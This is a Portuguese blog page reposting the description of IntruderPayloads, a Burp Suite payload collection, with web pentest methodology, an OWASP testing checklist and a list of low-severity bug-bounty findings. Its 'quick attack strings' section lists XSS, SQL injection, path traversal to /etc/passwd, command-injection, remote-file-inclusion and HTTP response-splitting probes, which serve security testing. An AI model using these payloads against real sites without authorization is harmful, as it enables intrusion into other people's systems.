IntruderPayloads - Uma coleção de cargas úteis de intrusão Burpsuite, listas de fuzz e carregamentos de arquivos - Anonymous Hacker

[Latest News][10]

Adobe
Análise de Vulnerabilidade
ANDROID
ANONYMOUS
Anti Vírus
ANTI-DDOS
ANTI-SPYWARES E ADWARES
Antivírus
APK PRO
APOSTILAS
apps
Ativador
CIÊNCIA
Compartilhadores
Computador pc
CURSO PHP
CURSO TCP / IP
CURSOS
Cursos Diversos
CYBORG
CYBORG FALÇÃO
DDOS
DEEPWEB
Desenvolvimento Web
DICAS
Diversos
DOCUMENTARIO
DoS
Editor de Áudio
Editor de Imagem
Editor de Texto
Editor de Vídeo
Engenharia
EXPLOIT
FACEBOOK
Ferramentas de rede
FORENSE DIGITAL
Fundamentos financeiros
Gravadores
Internet
INVASÕES
IPHONE
JOGOS
KALI LINUX
Limpeza e Utilitários
Lixão
MAC OS
macOS
Malware
Manutenção de Pcs
MySQL
NOTÍCIAS
PAGINA FAKE
PHP SCRIPT
Produtividade
Programa De Invasao
PROGRAMAÇÃO
PROGRAMAS
PROXY
SCRIPTS
SEGURANÇA
Seo
SHELL
SISTEMA OPERACIONAL
TÉCNICA DE INVASÃO
Termux
tools
Utilitários
VIDEOS
VPN
WHATSAPP
WINDOWS
Wireless Attacks
z=

IntruderPayloads - Uma coleção de cargas úteis de intrusão Burpsuite, listas de fuzz e carregamentos de arquivos

IntruderPayloads

Uma coleção de cargas úteis de Burpsuite Intruder e listas de fuzz e metodologia pentesting. Para retirar todos os reposes de terceiros, execute install.sh no mesmo diretório da pasta IntruderPayloads. 
  • Burpsuite Spider com apresentação inteligente de formulários
  • Rastreamento manual do site através do proxy do Burpsuite e envio de cargas úteis INJECTX para rastreamento
  • Varredura passiva Burpsuite
  • Ferramentas de noivado Burpsuite> Pesquisa> <form|<input|url=|path=|load=|INJECTX|Found|<!--|Exception|Query|ORA|SQL|error|Location|crowdshield|xerosecurity|username|password|document\.|location\.|eval\(|exec\(|\?wsdl|\.wsdl
  • Ferramentas de engajamento Burpsuite> Encontrar comentários
  • Ferramentas de engajamento Burpsuite> Encontre scripts
  • Ferramentas de engajamento Burpsuite> Encontrar referências
  • Ferramentas de engajamento Burpsuite> Analise o alvo
  • Ferramentas de engajamento Burpsuite> Descubra o conteúdo
  • Burpsuite Intruder> arquivo / diretório força bruta
  • Burpsuite Intruder> métodos HTTP, agentes de usuários, etc.
  • Enumerar todas as tecnologias de software, métodos HTTP e potenciais vetores de ataque
  • Compreender a função do site, quais tipos de dados são armazenados ou valiosos e que tipo de funções atacar, etc.
NUMERAÇÃO:
  • SISTEMA OPERACIONAL
  • SERVIDOR WEB
  • SERVIDORES DE BASE DE DADOS
  • LINGUAGENS DE PROGRAMAÇÃO
  • PLUGINS / VERSÕES
  • PORTOS ABERTOS
  • USERNAMES
  • SERVIÇOS
  • WEB SPIDERING
  • GOOGLE HACKING

VECTORES:
  • FORMULÁRIOS DE ENTRADA
  • GET / POST PARAMS
  • URI / REST STRUCTURE
  • BISCOITOS
  • HEADERS

QUADROS DE PESQUISA:
Apenas alguns termos regex úteis para pesquisar passivamente usando o Burpsuite ou qualquer outro proxy da Web ...
fname|phone|id|org_name|name|email

QUICK ATTACK STRINGS:
não é uma lista completa por qualquer meio, mas quando você está testando manualmente e andando por sites e precisa de uma cópia / pasta rápida, isso pode ser útil ...
Company
First Last
username
[email protected]
Password123$
+1416312384
google.com
https://google.com
//google.com
.google.com
https://google.com/.injectx/rfi_vuln.txt
https://google.com/.injectx/rfi_vuln.txt?`whoami`
https://google.com/.injectx/rfi_vuln.txt.png
https://google.com/.injectx/rfi_vuln.txt.html
12188
01/01/1979
4242424242424242
INJECTX
'>"></INJECTX>(1)
javascript:alert(1)//
"><img/onload=alert(1)>' -- 
"></textarea><img/onload=alert(1)>' -- 
INJECTX'>"><img/src="https://google.com/.injectx/xss_vuln.png"></img>
'>"><iframe/onload=alert(1)></iframe>
INJECTX'>"><ScRiPt>confirm(1)<ScRiPt>
"></textarea><img/onload=alert(1)>' -- // INJECTX <!-- 
"><img/onload=alert(1)>' -- // INJECTX <!-- 
INJECTX'"><h1>X<!-- 
INJECTX"><h1>X
en%0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%2020%0A%3Chtml%3EINJECTX%3C%2Fhtml%3E%0A%0A
%0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%2020%0A%3Chtml%3EINJECTX%3C%2Fhtml%3E%0A%0A
../../../../../../../../../../../etc/passwd
{{4+4}}
sleep 5; sleep 5 || sleep 5 | sleep 5 & sleep 5 && sleep 5
admin" or "1"="1"-- 
admin' or '1'='1'-- 
firstlastcompany%0a%0d

LISTA DE VERIFICAÇÃO DE TESTES OWASP:
  • Aranhas, Robôs e Crawlers IG-001
  • Descoberta / Reconhecimento do Search Engine IG-002
  • Identificar os pontos de entrada do aplicativo IG-003
  • Teste de Aplicação Web Fingerprint IG-004
  • Descoberta de Aplicação IG-005
  • Análise de códigos de erro IG-006
  • Teste SSL / TLS (Versão SSL, Algoritmos, Comprimento da chave, Cert. Digital) Validade) - Fraqueza SSL CM-001
  • DB Listener Testing - DB Ouvinte fraco CM-002
  • Testes de Gerenciamento de Configuração de Infraestrutura - Fracasso de Gerenciamento de Configuração de Infra-estrutura
  • Teste de Gerenciamento de Configuração de Aplicação - Gerenciamento de Configuração de Aplicativos fraqueza CM-004
  • Testando o Gerenciamento de Extensões de Arquivo - Processamento de extensões de arquivo CM-005
  • Arquivos antigos, de backup e não referenciados - Arquivos antigos, de backup e não referenciados CM-006
  • Interfaces de infraestrutura e administração de aplicativos - Acesso às interfaces de administração CM-007
  • Testando Métodos HTTP e XST - Métodos HTTP habilitados, XST permitido, Verbo HTTP CM-008
  • Transporte de credenciais através de um canal criptografado - Transporte de credenciais através de um canal criptografado AT-001
  • Testes para enumeração de usuários - Enumeração de usuários AT-002
  • Testando para a conta de usuário Guessable (Dicionário) - Conta de usuário susceptível de AT-003
  • Teste de Força Bruta - Credenciais Forçamento Bruto AT-004
  • Teste para ignorar o esquema de autenticação - Ignorando o esquema de autenticação AT-005
  • Teste de senha de lembrança vulnerável e reinicialização de pwd - Senha de lembrança vulnerável, reset de pwd fraco AT-006
  • Teste de Logout e Gerenciamento de cache do navegador - - Função de logout não implementada corretamente, fraqueza de cache do navegador AT-007
  • Testes para CAPTCHA - Implementação do Captcha fraco AT-008
  • Teste de autenticação de múltiplos fatores - Autenticação de fatores múltiplos fracos AT-009
  • Teste de condições de corrida - vulnerabilidade de condições de corrida AT-010
  • Testando o Esquema de Gerenciamento de Sessão - Ignorando o Esquema de Gerenciamento de Sessão, Token de Sessão Fraca SM-001
  • Atestados de Teste de Cookies - Os cookies são definidos não apenas 'HTTP Only', 'Seguro' e sem tempo de validade SM-002
  • Teste de Fixação de Sessão - Fixação de Sessão SM-003
  • Teste de Variáveis ​​de Sessão Expostas - Variáveis ​​de sessão sensíveis expostas SM-004
  • Testes para CSRF - CSRF SM-005
  • Teste de Path Traversal - Path Traversal AZ-001
  • Teste para ignorar o esquema de autorização - Ignorar o esquema de autorização AZ-002
  • Teste de Escalação Privilegiada - Escalação Privilegiada AZ-003
  • Testing for Business Logic - lógica de negócios de bloqueio BL-001
  • Testes para o Criptografado Cross Site Scripting - XSS DV-001 refletido
  • Teste de Stored Cross Site Scripting - armazenado XSS DV-002
  • Testando scripts baseados no site do DOM - DOM XSS DV-003
  • Teste de Cross Site Flashing - Cross Site Flashing DV-004
  • SQL Injection - SQL Injection DV-005
  • Injeção LDAP - Injeção LDAP DV-006
  • Injeção de ORM - Injeção de ORM DV-007
  • Injeção XML - Injeção XML DV-008
  • Injeção SSI - Injeção SSI DV-009
  • Injeção XPath - Injeção XPath DV-010
  • Injeção IMAP / SMTP - Injeção IMAP / SMTP DV-011
  • Injeção de código - Injeção de código DV-012
  • Comando do SO - Comando do SO DV-013
  • Desbordamento de buffer: estouro de buffer DV-014
  • Vulnerabilidade incubada - Vulnerabilidade incubada DV-015
  • Teste de Divisão / Contrabando HTTP - Divisão HTTP, Contrabando DV-016
  • Teste de ataques de curinga SQL - vulnerabilidade de curinga SQL DS-001
  • Bloqueando contas de clientes - Bloqueando contas de clientes DS-002
  • Testes para transbordamentos do buffer do DoS - buffer overflows DS-003
  • Alocação de objeto especificado pelo usuário - Alocação de objeto especificada pelo usuário DS-004
  • Entrada do usuário como um contador de loop - Entrada do usuário como um contador de loop DS-005
  • Escrevendo dados fornecidos pelo usuário ao disco - Escrevendo dados fornecidos pelo usuário ao disco DS-006
  • Falha na liberação de recursos - Falha na liberação de recursos DS-007
  • Armazenando muito dados na sessão - Armazenando muito dados na sessão DS-008
  • WS Information Gathering - NA WS-001
  • Testando WSDL - WSDL Fraqueza WS-002
  • Teste Estrutural XML - Estrutura XML Fraca WS-003
  • Teste de nível de conteúdo XML - nível de conteúdo XML WS-004
  • HTTP GET parameters / REST Testing - WS HTTP GET parameters / REST WS-005
  • Naughty SOAP anexos - WS Naughty SOAP anexos WS-006
  • Testes de repetição - WS Replay Testing WS-007
  • Vulnerabilidades AJAX - NA AJ-001
  • AJAX Testing - AJAX fraqueza AJ-002

BAIXA SEVERIDADE:
uma lista de descobertas de baixa gravidade que provavelmente estão fora do escopo para a maioria dos programas de recompensas de insetos, mas ainda são úteis para fazer referência para testes normais de penetração na web.
  • Mensagens de erro descritivo (p. Ex., Rastreios de pilha, erro de aplicativo ou servidor).
  • HTTP 404 códigos / páginas ou outros HTTP não-200 códigos / páginas.
  • Divulgação de Banner sobre serviços comuns / públicos.
  • Divulgação de arquivos ou diretórios públicos conhecidos (por exemplo, robots.txt).
  • Click-Jacking e problemas apenas exploráveis ​​através de cliques.
  • CSRF em formulários disponíveis para usuários anônimos (por exemplo, o formulário de contato).
  • Solicitação de Pedido de Cross-Site de Logout (log-CSRF).
  • Presença do aplicativo ou navegador "autocompletar" ou "salvar senha".
  • Falta de bandeiras de cookie seguras e HTTPOnly.
  • Falta de Segurança Speedbump ao sair do site.
  • Débito Captcha / Captcha Fraco
  • Enumeração de nome de usuário via Login Página mensagem de erro
  • Enumeração de nome de usuário via Senha esquecida, mensagem de erro
  • Login ou Forgot Password página força bruta e bloqueio de conta não forçado.
  • Método HTTP OPTIONS / TRACE habilitado
  • Ataques SSL como BEAST, BREACH, ataque de renegociação
  • O segredo SSL não está habilitado
  • Conjuntos de criptografia SSL Insegáveis
  • O cabeçalho anti-MIME-Sniffing X-Content-Type-Options
  • Falta cabeçalhos de segurança HTTP
  • Melhores práticas de segurança sem acompanhar a exploração de prova de conceito
  • Mensagens de erro descritivo (p. Ex., Rastreios de pilha, erro de aplicativo ou servidor).
  • HTTP 404 códigos / páginas ou outros HTTP não-200 códigos / páginas.
  • Ataques de negação de serviço.
  • Fingerprinting / banner divulgação em serviços comuns / públicos.
  • Divulgação de arquivos ou diretórios públicos conhecidos (por exemplo, robots.txt).
  • Clickjacking e problemas apenas exploráveis ​​através do clique.
  • CSRF em formulários não sensíveis.
  • Solicitação de Pedido de Cross-Site de Logout (log-CSRF).
  • Presença do aplicativo ou navegador "autocompletar" ou "salvar senha".
  • Falta de sinalizadores seguros / HTTPOnly em cookies não-sensíveis.
  • Falta de Segurança Speedbump ao sair do site.
  • Débito Captcha / Captcha Fraco
  • Login ou Forgot Password página força bruta e bloqueio de conta não forçado.
  • OPÇÕES Método HTTP habilitado
  • Scripts de conteúdo misto HTTPS
  • Bibliotecas vulneráveis ​​conhecidas
  • Ataques em serviços de anúncios de terceiros
  • Enumeração de nome de usuário / e-mail via Senha esquecida ou Página de login
  • Falta cabeçalhos de segurança HTTP
  • Strict-Transport-Security não habilitado para HTTPS
  • X-Frame-Options
  • X-XSS-Protection
  • X-Content-Type-Options
  • Política de segurança de conteúdo, X-Content-Security-Policy, X-WebKit-CSP
  • Conteúdo-Segurança-Política-relatório somente
  • Problemas SSL, por exemplo,
  • Ataques SSL como BEAST, BREACH, ataque de renegociação
  • O segredo SSL não está habilitado
  • Conjuntos de cifra fracos / inseguras SSL
  • Falta de registros SPF (Spoofing por e-mail)
  • Auto-completar habilitado nos campos de senha
  • HTTP habilitado
  • ID de sessão ou Login Sent Over HTTP
  • Cookies inseguros
  • Cross-Domain.xml permite todos os domínios
  • Domínios permitidos HTML5
  • Política de origem cruzada
  • Content Sniffing Not Disabled
  • Enumeração de conta de redefinição de senha
  • Abuso de Formulário HTML (Negação de Serviço)
  • Idade do HSTS fraca (86,000 ou menos)
  • Falta de Política de Segurança de Senha (Senhas Forçadas Brutas)
  • Teste físico
  • Ataques de negação de serviço
  • Ataques de Exaustão de Recursos
  • Questões relacionadas à limitação de taxa
  • Login ou Forgot Password página força bruta e bloqueio de conta não aplicado
  • api * .netflix.com escuta na porta 80
  • Política de acesso entre domínios abrangida por * .netflix.com
  • Nome de usuário / Enumeração de e-mail
  • via mensagem de erro da Página de Login
  • via mensagem de erro Esqueceu a senha
  • via registro
  • senha fraca
  • Passagem fraca Captcha / Captcha
  • Falta de sinalizadores seguros / HTTPOnly em cookies
  • Cookie válido após o fim de sessão
  • Cookie válido após a reinicialização da senha
  • Vencimento de cookies
  • Esqueceu a senha autologin
  • Reutilização token Autologin
  • Script do mesmo site
  • Problemas SSL, por exemplo,
  • Ataques SSL como BEAST, BREACH, ataque de renegociação
  • O segredo SSL não está habilitado
  • Conjuntos de cifra fracos / inseguras SSL
  • Vulnerabilidades SSL relacionadas à configuração ou versão
  • Mensagens de erro descritivo (p. Ex., Rastreios de pilha, erro de aplicativo ou servidor).
  • HTTP 404 códigos / páginas ou outros HTTP não-200 códigos / páginas.
  • Fingerprinting / banner divulgação em serviços comuns / públicos.
  • Divulgação de arquivos ou diretórios públicos conhecidos (por exemplo, robots.txt).
  • Clickjacking e problemas apenas exploráveis ​​através do clique.
  • CSRF em formulários disponíveis para usuários anônimos (por exemplo, o formulário de contato).
  • Solicitação de Pedido de Cross-Site de Logout (log-CSRF).
  • Falta a proteção CSRF na funcionalidade não-sensível
  • Presença do aplicativo ou navegador "autocompletar" ou "salvar senha".
  • Charset incorreto
  • Autocompletar HTML
  • OPÇÕES Método HTTP habilitado
  • Método TRACE HTTP habilitado
  • Faltando cabeçalhos de segurança HTTP, especificamente
  • https://www.owasp.org/index.php/List_of_useful_HTTP_headers ), por exemplo,
  • Strict-Transport-Security
  • X-Frame-Options
  • X-XSS-Protection
  • X-Content-Type-Options
  • Política de segurança de conteúdo, X-Content-Security-Policy, X-WebKit-CSP
  • Conteúdo-Segurança-Política-relatório somente
  • Problemas apenas presentes em navegadores antigos / antigos plugins / navegadores de software de fim de vida
  • IE <9
  • Chrome <40
  • Firefox <35
  • Safari <7
  • Opera <13
  • Relatórios de vulnerabilidade relacionados aos números de versão relatados de servidores web, serviços ou frameworks



Sobre

trabalho com segurança da informação a 13 anos, grande parte desse tempo como professor. Fiz meu bacharelado em ciência da computação, especialização em segurança da informação e logo após, mestrado em ciência da informação.

Nenhum comentário:

Postar um comentário

Start typing and press Enter to search